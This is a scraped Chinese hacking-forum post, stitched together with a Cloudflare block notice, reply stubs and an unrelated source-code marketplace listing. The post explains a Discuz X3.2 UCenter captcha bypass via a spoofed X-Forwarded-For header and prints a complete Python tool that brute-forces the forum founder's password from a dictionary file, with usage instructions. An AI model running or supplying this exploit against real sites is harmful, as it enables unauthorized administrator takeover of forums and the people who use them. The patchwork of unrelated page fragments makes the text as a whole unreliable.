Access denied | www.cgzzn.com used Cloudflare to restrict access
Please enable cookies.
What happened?
The owner of this website (www.cgzzn.com) has banned your access based on your browser's signature (cb5438-ua98).Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
查看: 32440|回复: 329
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
主题热度贡献
天涯海角搜一下：
本帖最后由 民审-M 于
19:58 编辑
只要知道了账号密码，就相当于拿下了，可以为所欲为了。对于这种重要的东西，一直都是黑客们想要的东西，而对付它的好办法除了社工就是爆破了。社工不是我们这个帖子的目的，我们就开始讲爆破。而一般的爆破在验证码下显得那么无力，爆破的前提就是没有验证码和密码输错，还有知道账号的限制，这里只有没有密码输错限制，还有默认的账号名，了个验证码当阻碍，但是我们发现了一个小问题。导致这个验证码被无视掉，直接进行爆破。这个漏洞的发现者是JJ Fly,乌云漏洞地址为http://www.wooyun.org/bugs/wooyun-,下面的内容大部分从乌云截取。这里有个验证码的地址，为：http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&。但是
& && &经过测试发现
& && &登陆uc_server的时候 如果ip第一次出现那么 seccode的默认值为cccc
& && &而 ip地址 是通过X-Forwarded-For 获取的。
& && &也就是我们修改xff的ip之后，再次打开上面那个验证码url，图片的值为cccc所有，根据这个漏洞，就可以进行爆破，下面是该漏洞作者给出的漏洞利用exp：#!/usr/bin/env python
# -*- coding: cp936 -*-
#Dz论坛创始人爆破脚本
#由爱安全攻防实验室夕阳编写
import httplib
import re
import random
import urllib
import time
from sys import argv
def GetHtml(host,htmlhash,htmlpass,htmlseccode):
& & & & ip=str(random.randint(1,100))+&.&+str(random.randint(100,244))+&.&+str(random.randint(100,244))+&.&+str(random.randint(100,244))
& & & & postHead={&Host&:host,&User-Agent&: &Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/ Firefox/44.0 &,&X-Forwarded-For&:ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8','Connection':'keep-alive'}
& & & & postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'
& & & & resultHtml=httplib.HTTPConnection(host)
& & & & resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',postContent,postHead )
& & & & page=resultHtml.getresponse()
& & & & pageConect=page.read()
& & & & return pageConect
def GetHash(host):
& & & & url='http://'+host+'/uc_server/admin.php'
& & & & pageContent=urllib.urlopen(url).read()
& & & & htmlhash=re.findall('&input type=&hidden& name=&formhash& value=&(.*?)& /&',pageContent)
& & & & htmlseccode=re.findall('&input type=&hidden& name=&seccodehidden& value=&(.*?)& /&',pageContent)
& & & & return htmlhash+htmlseccode
if(len(argv)==1):
print '& && && && & . .............................................. .'
print '& && && && & .. ...&&....isssssssssssssssssssssssssr,...& &... '
print '& && && && & . . .,,. ..ihSSSSSSSSSSSSSSSSSSSS5S991,. .::, .. .'
print '& && && && & . :ishhi,& &.i,&&.:s55hs,&&.'
print '& && && && & . r15SSShi,& &.i15SSSSSSSSSSS5S331:&&.:s5SS5S3;&&.'
print '& && && && & . r1SSSSSShi,& &.ihSSSSSSSSSS99h:&&.:s5SSSSSSS;&&'
print '& && && && & . ;sSSSSS33Shi,& &,ihS3333399h:&&.:sS33SSSSS3S:&&.'
print '& && && && & . .;hShi,& &,r55hhSh;&&.:sS,. .'
print '& && && && & . .,sShi,.&&.. ..&&.:sSr.. .'
print '& && && && & . ..;5S..........,sSS95, . .'
print '& && && && & . ..,S31..........,1SSS9r .. .'
print '& && && && & . ...rS1.& && & ...rSS: .. .'
print '& && && && & . ...:h3;. .,;::;:. ..:s.... .'
print '& && && && & . ...,sSS3SS995;& &,s5SSSSS1;.& &:sS3333S33; ... .'
print '& && && && & . ....;533995;& &,r;.& &:s53398h,.... .'
print '& && && && & . .....,i1h;&&.,r3S1;.&&.:s51;,..... .'
print '& && && && & . .....& &&&..;33SS33h;.. ..&&...... .'
print '& && && && & . ............,;shS333S33SSS39935s:............. .'
print '& && && && & . ............& &.,i15S33993S1;,& &............. .'
print '& && && && & .& && && && && && & .ii11i,& && && && && && && &.'
print '& && && && && && && && && && && && && && && && && && && && && && && && && && & '
print '& && && && && && && && && && && && && && && && && && && && && && && && && && & '
print '& && && && && && &&&欢迎使用Dz论坛无视验证码爆破创始人密码工具& && && && && && && &'
print '-------------------------------------------------------------------------------'
print '|& && && && && && && && && &&&Team:爱安全攻防实验室& && && && && && && && && &|'
print '|& && && && && && && && && && && & Author:夕阳& && && && && && && && && && &&&|'
print '|& && && && && && && && && && &site:www.ixsec.org& && && && && && && && && &&&|'
print '|& && && && && && && && &如果有BUG请联系我的QQ：& && && && && && &&&|'
print '-------------------------------------------------------------------------------'
print ' 使用说明& && &&&|&&参数格式—&& && & host地址& && &字典文件& & '
print '字典放在当前目录 |&&参数格式—&& && &www.xxx.com& & pass.txt& & '
else:
& & & & host=argv[1]
& & & & passfile=argv[2]
& & & & print '网站host为&&'+host
& & & & print '密码字典为&&'+passfile
& & & & print '---&开始，请耐心等候才怪'
& & & & x=GetHash(host)
& & & & for i in open(passfile):
& & & & & & & & if(GetHtml(host,x[0],i,x[1])==''):
& & & & & & & & & & & & print '密码为 '+i
& & & & & & & & & & & & break复制代码
更多：游客，如果您要查看本帖隐藏内容请
& 声明: 本文仅代表作者观点，不代表草根吧立场，与草根吧无关。本文系作者授权草根吧发表，未经许可，不得转载。
帖子地址：&分享给好友
本文来源于草根吧 ，欢迎大家下载。
如果您没有贡献需要充值，可以直接在线充值，
如果你需要加入本站赞助VIP会员，可以直接在线开通，
如果找不到您要的资源，请搜索一下，
主题热度贡献
提示: 作者被禁止或删除 内容自动屏蔽
主题热度贡献
初级草根, 积分 25, 距离下一级还需 75 积分
初级草根, 积分 25, 距离下一级还需 75 积分
ll论坛创始人无视验证码
主题热度贡献
步入草根, 积分 322, 距离下一级还需 -302 积分
步入草根, 积分 322, 距离下一级还需 -302 积分
主题热度贡献
步入草根, 积分 6, 距离下一级还需 14 积分
步入草根, 积分 6, 距离下一级还需 14 积分
UC漏洞直接拿shell论坛创始人无视验证码爆破 [修改]
主题热度贡献
步入草根, 积分 32, 距离下一级还需 -12 积分
步入草根, 积分 32, 距离下一级还需 -12 积分
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
主题热度贡献
初级草根, 积分 21, 距离下一级还需 79 积分
初级草根, 积分 21, 距离下一级还需 79 积分
Dz论坛创始人爆破脚本：Discuz论坛创始人无视验证码爆破工具2016最新修复版 Dz论坛创始人爆破脚本：Discuz论坛创始人无视验证码爆破工具2016最新修复版 Dz论坛创始人爆破脚本：Discuz论坛创始人无视验证码爆破工具2016最新修复版 Dz论坛创始人爆破脚本：Discuz论坛创始人无视验证码爆破工具2016最新修复版
主题热度贡献
洞直接拿shell论坛创始人无视验证码爆破 [修改]
主题热度贡献
中级草根, 积分 146, 距离下一级还需 354 积分
中级草根, 积分 146, 距离下一级还需 354 积分
啦咯啦咯啦咯啦咯啦咯
主题热度贡献
步入草根, 积分 176, 距离下一级还需 -156 积分
步入草根, 积分 176, 距离下一级还需 -156 积分
z论坛个人资料用户栏目出生地栏目可能导致可执行一句话
成为会员，尽享百款插件模板免费下载当前位置: >
注册短信验证 全功能多接口版5.0.4Discuz/DZ/论坛插件/网站源码
语&言：PHP
数&据&库：Mysql
品&牌：discuz
演示网站：
大&小：3 MB
最后刷新：
移&动&端：
安装服务：￥32.00（额外,可选）
若交易失败（退款），您可以额外获得交易额5~10%的消保赔付金。担保交易，有问题不解决24小时内可申请退款，安全保证。
支付宝微信支付
财付通网上银行
 联系卖家
技术微信⑤：xi
4.95
4.96
4.95
技术微信⑤：xi
温馨提示：因本店业务繁忙，请需要提供安装服务的买家提前与本店客服联系在购买。如买家购买之后才需要提供安装服务，本店可能暂不处理！谢谢合作！！小白勿拍。本插件亮点 考虑到注册乃系统根本所在，本源码未加密、变量命名清晰自然，方便二次开发和维护支持安米，虽然安米一直在更新，我们也会尽量更新插件支持安米。整合千帆APP，并不是把千帆接口替换为我们的，而是我们这边注册、绑定、修改的手机号可以在千帆那边登陆。另外可以联系千帆技术做一些处理，千帆那边用户也可以在我们这边登录找密码了。真正打通千帆和网站的手机用户啦由于我们手机号自动同步到Discuz系统自带的common_member_profile表mobile字段，因此兼容性更好。因此可与魔瓶APP、马甲APP等实现手机号用户数据互通功能。（也就是通过我们这里注册手机号，可以在他们那里登录，他们那里手机号注册用户，也可以在dz这边进行登录），注意，此功能您一定要仔细您app开发者是否使用了discuz内置mobile的手机号作为用户手机号登录凭证。支持多短信接口，阿里大鱼的个人用户，基本上很难享受完整短信服务，因此本插件支持“短信宝”接口，也能有比较好的短信发送体验。短信注册，同时支持手机touch版本、安米app版本短信绑定手机号，同时支持手机touch版本、安米app版本短信修改手机号，同时支持手机touch版本短信找回密码，同时支持手机touch版本、安米app版本手机号登录，同时支持手机版，用户可通过自己手机号+密码登录网站回帖手机短信通知，同时支持手机版用户发帖后，有人回帖，会有短信提醒。（增加用户粘性，发送频率后台可配置）回帖邮箱通知提醒，同时支持手机版，同上，邮箱提醒。短信群发，群发短信，营销利器（后台群发）。分用户组群发、或者直接输入手机号群发短信。安米手机app的全面支持，支持短信注册、手机号登录、手机短信找回密码功能。积分转账短信验证，保护积分安全600+用户真实网站验证，180+商业用户验证，发送量大的日发送短信量数千，经得起生产环境考验。我们用户相关手机号，直接保存在discuz自带表中，这样可以兼容所有短信相关的功能插件。并非其他插件将短信防止单独表、然后同步数据到dz表。（因此，我们插件即使你卸载重装，不会影响你手机号和用户相关联数据。）《注册短信验证》全功能多接口版，同时支持“阿里大鱼”和“短信宝”短信接口，自由切换短信接口（短信宝：发送速度更快，短信模板免审核，适合个人用户；阿里大鱼：大公司、大品牌，更加稳定安全）。后台50+项参数配置，最大限度，最自由的设置。满足绝大部分网站的手机需求。手机短信注册目的，除防垃圾用户外，短信营销则更加重要，本插件集成邮箱、短信通知提醒功能，适当设置，可增加网站用户粘性。支持后台认证用户管理，可以后台搜索用户，修改绑定信息。支持积分转账必须手机安全验证，保护积分安全。支持发送报表查询，发送消费记录一目了然支持PHP7,PHP7.1，性能更好，更加节省服务器资源（全功能版本）支持Discuz! X3.3 （全功能版本）
&&&交易评价
&&&交易规则
1、自动：在上方保障服务中标有自动发货的商品，拍下后，将会自动收到来自卖家的商品获取（下载）链接；
2、手动：未标有自动发货的的商品，拍下后，卖家会收到邮件、短信提醒，也可通过QQ或订单中的电话联系对方。
1、源码交易默认交易周期为1天，买家可操作再延长3天（仅有1次延长权利）；
2、若上述交易周期双方依然无法完成交易，任意一方可发起追加周期（1~60天）的请求，对方同意即可延长。
1、描述：源码描述(含标题)与实际源码不一致的（例：描述PHP实际为ASP、描述的功能实际缺少、版本不符等）；
2、演示：有演示站时，与实际源码小于95%一致的（但描述中有"不保证完全一样、有变化的可能性"类似显著声明的除外）；
3、发货：手动发货源码，在卖家未发货前，已申请退款的；
4、安装：免费提供安装服务的源码但卖家不履行的；
5、收费：额外收取其他费用的（但描述中有显著声明或双方交易前有商定的除外）；
6、其他：如质量方面的硬性常规问题等。
注：经核实符合上述任一，均支持退款，但卖家予以积极解决问题则除外。
1、互站会对双方交易的过程及交易商品的快照进行永久存档，以确保交易的真实、有效、安全！
2、互站无法对如“永久包更新”、“永久技术支持”等类似交易之后的商家承诺做担保，请买家自行鉴别；
3、在源码同时有网站演示与图片演示，且站演与图演不一致时，默认按图演作为纠纷评判依据（特别声明或有商定除外）；
4、在没有"无任何正当退款依据"的前提下，商品写有"一旦售出，概不支持退款"等类似的声明，视为无效声明；
5、在未拍下前，双方在QQ上所商定的交易内容，亦可成为纠纷评判依据（商定与描述冲突时，商定为准）；
6、因聊天记录可作为纠纷评判依据，故双方联系时，只与对方在互站上所留的QQ、手机号沟通，以防对方不承认自我承诺。
7、虽然交易产生纠纷的几率很小，但一定要保留如聊天记录、手机短信等这样的重要信息，以防产生纠纷时便于互站介入快速处理。
1、互站作为第三方中介平台，依据交易合同（商品描述、交易前商定的内容）来保障交易的安全及买卖双方的权益；
2、非平台线上交易的项目，出现任何后果均与互站无关；无论卖家以何理由要求线下交易的，请联系管理举报。
&&& 店内搜索
&&&本店销量榜
1（限时特价）直播app源码ios/android最新映...
2云豹直播完整源码破解版 手机直播系统完...
3（完整版）php直销会员管理系统源码
4（完整带app）（限时特价）云豹直播源码...
5（限时特价）thinkphp 微信三级分销商城源...
6手机视频直播 APP系统开发 映客花椒类型...
7微擎+微赞通用_码上点餐（微餐饮|微外卖...
8（详细文档）java电商 商城 微商城 b2b2c多...
9最新WordPress多功能新闻积分商城主题Len...
10（独家完整）HTML5手机游戏《征战三国》...
互站官方微信